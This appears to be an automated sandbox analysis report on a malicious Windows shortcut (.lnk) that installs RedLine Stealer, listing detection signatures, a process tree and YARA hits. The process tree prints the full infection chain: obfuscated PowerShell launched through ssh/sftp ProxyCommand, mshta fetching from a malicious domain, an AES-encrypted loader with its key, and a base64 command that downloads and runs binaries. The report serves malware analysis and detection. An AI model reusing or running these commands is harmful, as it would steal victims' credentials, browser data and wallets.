Edit tour

Windows Analysis Report
sEOELQpFOB.lnk

Overview

General Information

Sample name:	sEOELQpFOB.lnk renamed because original name is a hash value
Original sample name:	3a1a340bf1283ba3c30c49c57103c5a3218771910256c8b0d92b94f7a1513f4e.lnk.d.lnk
Analysis ID:	1576538
MD5:	087dd017a8261d6c06f3401db80e0c33
SHA1:	b20a99fedd78e2207535d73a2ac76d6053e3bbf1
SHA256:	3a1a340bf1283ba3c30c49c57103c5a3218771910256c8b0d92b94f7a1513f4e
Tags:	lnkstaticklipxuhaq-shopuser-JAMESWT_MHT
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Windows shortcut file (LNK) starts blacklisted processes

Yara detected RedLine Stealer

AI detected suspicious sample

Connects to many ports of the same IP (likely port scanning)

Encrypted powershell cmdline option found

Powershell drops PE file

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded Invoke Keyword

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Lolbin Ssh.exe Use As Proxy

Sigma detected: Suspicious Execution of Powershell with Base64

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

sftp.exe (PID: 7832 cmdline: "C:\Windows\System32\OpenSSH\sftp.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']')" . MD5: 72C41AA478CA868F95AD0936AF65818A)

conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ssh.exe (PID: 7936 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" "-oForwardX11 no" "-oForwardAgent no" "-oPermitLocalCommand no" "-oClearAllForwardings yes" -o "ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']')" "-oProtocol 2" -s -- . sftp MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)

powershell.exe (PID: 7952 cmdline: powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']') MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 8108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://static.klipxuhaq.shop/3VKKE.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9)

mshta.exe (PID: 8188 cmdline: "C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/3VKKE.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 1080 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wrdZ($UvhG){return -split ($UvhG -replace '..', '0x$& ')};$ERHgk = wrdZ('ECA586FB867E54D080F88AB849BFB94F298E9D4D174F6B1F2F81610C3540C56191E34FB7B2DF87630478E180DACA97337CF338C5F0549579E18CC1A49A1339F9691FAE2EDAAC0D6E2AB4913030D45E7F9C40731A7B0ED45F438D15D573AB5E4816A3D8CA82DAA342D630EDB6E24E85F4D05E0447A728444A18214CD35DB1FD5C4C677BF1EB6DD62A0D4B42A5F996D056A8C58BF2B2ADC007CA0004F35EEDF7DB06CC47C0E8175257375360952646DDCE12F86A389A2FB4F08F04DF71ABBD10CA19394807E45AE262B4CF2BD880666BE9808038992E086339CA69F730462BD5BA268BEA9591B45C3FDDC4B990452C3C5B083B1D8A99DB9D344BE7F259679F7994FBAA4E272654402905FEB107236FDE83FA247F6DFF5EE2DE2FBE984DE8D33A5077EC31D65DAE7AAC344DB18BADD0E59C3DC0A20AA1776387E75ED82F6F21E81D436D435FE7641490C8BB3BE615F9D76B1F8A1323001EC29CB1DC720A20647927291ABFCCFF409B1F94A878B0CDB0AFF68E11DAF8B2CCB95D3B395C11FB1D2F79673936E5F6AF545B019BFDE71CDAC1667709524F9244C6D8B3198F1F28C92F507AF233B70FD15099184E521AA3D1F4EB4613BE4CC9617FD5EE373CB05A7B164A2B6211387C494F7FC2F64FB4B0EEC11B39FFCC4E09EE10E96070192D4E0E2AD737B857A3BA8766EF8B454E4CC9BAE60331184407821C7F5A417DEBB95885CD929FAC64B5913D45E20BA92710C789EA36BC01ED629BAAEEFB8F420E9D966E4669DB7E1EE213C1001073B4FB67BB454BA80B0144D096E4FA221E9AB74FB2FDA2CBBA9C669EB50610B810047A6A75A1E41407350666C1B141836EA4FB3C9588111CE216EB2E451248C7008EA09561E08463428A981B69214151A19DD58483CB4A07DA879953AA3FDBF8EC16A79ACD16FBF54B34E405FCE7D15727908982C71DB4EC3160579745FCBC610756535558573F49618C7606881E9C8F026001D9C1C40FD2462CC1EC3DCF620D160F23D6F789F8CAA4EE9835FD65AA1D0E0278809DE0D85C1295E58C782AAFF7016B75C2FBB65FE1F73E7B038C89BAA57C32930D22EE8C71A06F4A2C738995833A10226ECDFB07ECD5F6DA31617797E009FA791AB33D9189A3A8E44428EFC9D7C6FAC3474FD38038FE910BBB036CFF902B287315F807FAAA06AED95210DDE82DAEAC0A523D871AE53C0EF75EF61B9A57F8F33A81ABD5D297C8FA835397595E7202A8E9007FFC7EDE814D001B798D89293879C641BE0707A91665E5503FECF99138AC09675DB1C070F4CF90193587A5FFC1CEE76401544370EB81704BA787C0CD04C9585C45A98FE309B624E2A8DF58992BFB2E28E05D3E083F40D7259170B815F21C934D9A6B716FB374544D200AC2F51F83FF6015BF31FAF855ACD6F94C4EDCFFE1B1B1E84CD0DCE3476BE438811875890C244AF355F5A99D60D3FE596651A7FCE949EF11B75A3E47270440D77D7293E40B99F248B7EA50AE844851B9FCECC2A42A543848822154E0BDE72E753A37ABBC37D5A523E44824FDECB7EA3DA94AE0BC489AFB57E7FF8B9D330E6B6CF749C38703F35FBB8C7524C1CC772CB6E97F52B9A303F765EEA1CF88781CF03DBAF4E05C5E83D04900C62AE76C9060D2EF02C6358A9C35D3C5CADDA4513FE8720161EE8D258C9D8738089620A44FDD02266B9393340D2A4D6DF53670CE0EAC8ADF596CBD6821F99D9AA7D32C9C1C8CDD6A112CF9684123E95FA54979737993CA2ED54A8E4E7B526955F3B82D4D1180DCF858A68E630366BAE559198412C920E3DF514DC1275386D42B0CF7D7800F9A9C56DF30AC55BB715221A65AC5F1B6C047475AF5D327C3E5F8421DC5507C9898E1CA30BC70D6ED81C7FBE88DC6473A1B361F63E277C1B83D0BA47D9D3A44BB1ED147D9E3D1391B4E0C9728E31F4600C8F8CDC7EA1BB362F215217B57B713C7F2C9B60FFBB1ABFF32654C427DAA0BD39D0753919D0F4F7B47FF923BD6168030D3B1CA13A0BC8AE221E2EFF957C435C969E04687A2C6C904546412E258E176D90F2AB2610D646A04013170A7E91553C26CB19E387AC2878C25187D9EC33EAC057D9448A0E50970D725F4AE31251B623B0B5A305DCAC452B7DA140F210FCC343D9FBD0EC51684312B709C31444AACFA23CFEAB3AE4AC1C6A879FE470B6416CEBB2F178AE84573C53893E06FC0AE6ECFC03F4C90F076720D4B810C012F09743B0BF027AFB2E867A6E3F73245EFE09DF5DCE804610D56D01DC824BF35F45CB7EDA5CD64F311A3B61FE521DA848A9CAB24E748591B220CEEFE7D9A36BBC1E5F24BF30F5CE52169CB97FAAE75575413CD60AE32FC1A6CC27C9980085CDA2F8C27D87CA1FF168195891536630388FFCD9C372990E8DB3035DB41B4F05649EDF35A78D27B65607BED7BF574919DED94333AA2853E49B351986E8299E7F8CB9EB1BB9794F03018AB908F931503BFEACE65F8679C093B2329E97B124254753C5C544C2750918D3F7D58E7556F9CDBE22D8EF4E087662E02BE99BDC7FEBE9725EC81D8FFEAB94C47300957B76133483633F4C417A4E36BE4BA53126A232E102EAE8CFBF4D04771B0B17331D769C9868C1BA21D79B62C6156B711C4DA2AE26EA3AC3AA1234E4D38FA65E44011BF70B4B8164D5F6803D08C5EF5B31BAAF7604E5ED04E78508A96C33DC3492F83F453FD1E760E7AF8934042152026B411DA5D050D3FD8CCD624AC5D4F6ACF0304BA03E7EA0E9E334B99AA805A7D4CD723334E8FF067C594EBB0E5C6E10C35DFAEDF91E5435A572165C3928CD8C7A89E4B018B67367579AC884AE72CC15C6507DD451FA613ABABFB1BEB49E6524CDCFC6DFC638DBC730BE50DE2F5E34D5F663DF4F56A2742C0A7FF04F9AD3FEE4DF08653E02F23B90B05B4B5E605FD41CFF536CB679848F513DD2D7927CE2E9E159E7FE452FD3CA59EA983EB5045FD03D30192780BC10C8AC0A57B49F8DC235CB74504E0E301B1C0E41DABA9A975A56696157984A6AD4A76AE095BFD4669183463DD41D43595B0446410F94FD2B2C020C103C2A0BAB641ABF60DFAEBDE549EF5A220BCE98226A0CE20B9225E1385E98ADFBA9CF1850D7F113DB328BE5E3C9340A2A952E676B9BEC2B6120988762635F70A05D2B777638385AD00F32DE0C206E562B0C2195FC2AD184ED4D67B68C93D7210AA4A20118614889E0786C0E9C0FC28EF8F771F6320C8D924C92FBFA72E2F719D17C1A309B8EB56AA40BBF5DFC35CAC2B40719ADE0D17B5052200F6EF4BB1C7B93D9C0944E8005D65AC117C7B894D5EEC87F17109C1949668FFDC7A4CA6C940B88918C3DE04F4A4CC43DE2D7131D26A49125B2C46CFCEE8AF68EAAEC1AEF8D3C8C1BDD83E8126909DCB7CCEB105D450824ACCDB5C4E8A86CD12F1D1AF6BB83D6F2EAD63BB04655509F1109DCB3566BF352891E4BD45C18681F6E05F6BCB9621FA298C87220A4C95FD32B57EB11E136B0F2B1EA66CDA02C81C9506E52D8DDB49AAEB7BF8338DC00C174FC70E63AC9A2DB86B995EFD4E27B06E95285A47557301FBFA59F163C94BC198DBC2E9A3AABEDDAB1968AD63CC18FBBD99FCC92C4B66F67B13E361C60F5DE165F887A5FD810B1FC0D81F20D34B77231A785EA4F3C2FABF388D5F425D0B49D28D797587AD2A76BB48EBCAA42A261893ED1243B7B8B39A642FB81DE7693B76CABA8D573C7CDB16F821D88C0A82B778C8B6A7041CFB6AE7518394091122A37BA9A348655774955AC96E899B16C45DD9F498BF83331A78A07D675E0F617E2302DD1BE067435EF00E8CE909F6997221E215908093F119F9E973D693875506C00344360E305434E218FDBB34B36412FEB62E4B519613672B8D0572BAD09FF488FB9CAE9A7C1FE5D3FB245FB243F1502CBA5B42C3CE66FC0C6F92DA0F28B9FC0925F12D5DF11D10D4F3E965D5025E2246B6E0B2A80B2B0B9780F6AD69813C90E900DD592BF5CD589A648E97917D567418BB6C536052204E09FA189445CF4D138D886258BCA2C85028723BA69A14D89DC4C5FE6415BA90A1387A444AA3A25EBEC36D5F01425A866E96BBA5707D665D69B73587240C5BB26999293879135BC569AB94BC5D8B8171BDAFD8ACE9403BC1BE80B00859E9B66A116F1F4F1F61E999A2910C8BA17673DD98B2B1C5531DC9E5BE8CD421CC04F219A1A0CB2BC4FA49CC317D1110D35CA05E5ABE31F2A39C7B38F6E5480485B0');$fkxI=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((wrdZ('71747743676D42704F54615370636865')),[byte[]]::new(16)).TransformFinalBlock($ERHgk,0,$ERHgk.Length)); & $fkxI.Substring(0,3) $fkxI.Substring(433) MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -WindowStyle Hidden -EncodedCommand JABhAEoAdwA3AD0AIgB1AHAAZABhAHQAZQByAC4AZQB4AGUAIgA7ACQAawBOAHIAMwA9AC0AagBvAGkAbgAoACgANgA1AC4ALgA5ADAAKQArACgAOQA3AC4ALgAxADIAMgApAHwARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0AHsAWwBjAGgAYQByAF0AJABfAH0AfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKwAiAC4AYgBpAG4AIgA7ACQAagBYAHEANAA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQARQBNAFAAIAAtAEMAaABpAGwAZABQAGEAdABoACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwB8AEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAB7AFsAYwBoAGEAcgBdACQAXwB9ACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKQA7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAagBYAHEANAAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQB8AE8AdQB0AC0ATgB1AGwAbAA7ACQAcABIAHQANgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACQAYQBKAHcANwA7ACQAcwBXAGYAMgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACQAawBOAHIAMwA7ACQAdgBQAGIAOQA9ACIAaAB0AHQAcABzADoALwAvAGMAbgBkAGUAZgAxAC4AZwByAGUAZQBuAC0AcABhAHQAaAB3AGEAeQBzAC4AcwBoAG8AcAAvAGEAcABpAC8AdQB6AC8ANwA1ADUAMgA5ADcAMwA2ADUAMAAvAHUALgBiAGkAbgAiADsAJAB4AFEAZAA1AD0AIgBoAHQAdABwAHMAOgAvAC8AYwBuAGQAZQBmADEALgBnAHIAZQBlAG4ALQBwAGEAdABoAHcAYQB5AHMALgBzAGgAbwBwAC8AYQBwAGkALwB1AHoALwA3ADUANQAyADkANwAzADYANQAwAC8AbgBuAG4ALgBiAGkAbgAiADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdgBQAGIAOQAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABIAHQANgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB4AFEAZAA1ACAALQBPAHUAdABGAGkAbABlACAAJABzAFcAZgAyACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABIAHQANgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAHMAVwBmADIAOwAmACAAKABbAHMAYwByAGkAcAB0AGIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACgAKAAnAGUAJwArACcAeABpACcAKwAnAHQAJwApACAALQBqAG8AaQBuACAAJwAnACkAKQApAA== MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

updater.exe (PID: 8800 cmdline: "C:\Users\user\AppData\Local\Temp\71532689\updater.exe" C:\Users\user\AppData\Local\Temp\71532689\XPoaTdYD.bin MD5: C56B5F0201A3B3DE53E561FE76912BFD)

InstallUtil.exe (PID: 8852 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

Acrobat.exe (PID: 8128 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\ref095vq842r70_3rd_party_authorisation_form.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 8016 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 912 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1620,i,9604478035381720578,9467704426141136404,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

svchost.exe (PID: 7520 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

AutoIt3.exe (PID: 9016 cmdline: "C:\ehcfdbh\AutoIt3.exe" C:\ehcfdbh\bhcbhah.a3x MD5: C56B5F0201A3B3DE53E561FE76912BFD)

InstallUtil.exe (PID: 9060 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

InstallUtil.exe (PID: 9068 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

InstallUtil.exe (PID: 9076 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

AutoIt3.exe (PID: 9132 cmdline: "C:\ehcfdbh\AutoIt3.exe" C:\ehcfdbh\bhcbhah.a3x MD5: C56B5F0201A3B3DE53E561FE76912BFD)

InstallUtil.exe (PID: 6860 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000016.00000003.1833241977.0000000004B60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000003.1833241977.0000000004B60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001A.00000003.1908914429.0000000004770000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001A.00000003.1908914429.0000000004770000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000014.00000002.1674485682.0000000004508000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.1674485682.0000000004508000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000019.00000002.1834778236.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000019.00000002.1834778236.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000014.00000003.1667401660.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.1667401660.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001A.00000003.1908716949.0000000004970000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001A.00000003.1908716949.0000000004970000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001A.00000002.1914811430.0000000003FC8000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001A.00000002.1914811430.0000000003FC8000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000016.00000002.1840944996.00000000041B8000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000002.1840944996.00000000041B8000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000016.00000003.1833497211.0000000004960000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000003.1833497211.0000000004960000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000014.00000003.1667521977.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.1667521977.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: powershell.exe PID: 1080	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xe6c29:$b1: ::WriteAllBytes( 0xe78ff:$b1: ::WriteAllBytes( 0x2bef5c:$b1: ::WriteAllBytes( 0x2bf96a:$b1: ::WriteAllBytes( 0xb28a:$s1: -join 0x1835f:$s1: -join 0x1b731:$s1: -join 0x1bde3:$s1: -join 0x1d8d4:$s1: -join 0x1fada:$s1: -join 0x20301:$s1: -join 0x20b71:$s1: -join 0x212ac:$s1: -join 0x212de:$s1: -join 0x21326:$s1: -join 0x21345:$s1: -join 0x21b95:$s1: -join 0x21d11:$s1: -join 0x21d89:$s1: -join 0x21e1c:$s1: -join 0x22082:$s1: -join
Process Memory Space: updater.exe PID: 8800	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: updater.exe PID: 8800	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: updater.exe PID: 8800	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 8852	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 8852	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: AutoIt3.exe PID: 9016	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: AutoIt3.exe PID: 9016	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AutoIt3.exe PID: 9016	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 9076	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 9076	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: AutoIt3.exe PID: 9132	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: AutoIt3.exe PID: 9132	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AutoIt3.exe PID: 9132	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 29 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
25.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
25.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
25.2.InstallUtil.exe.400000.0.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

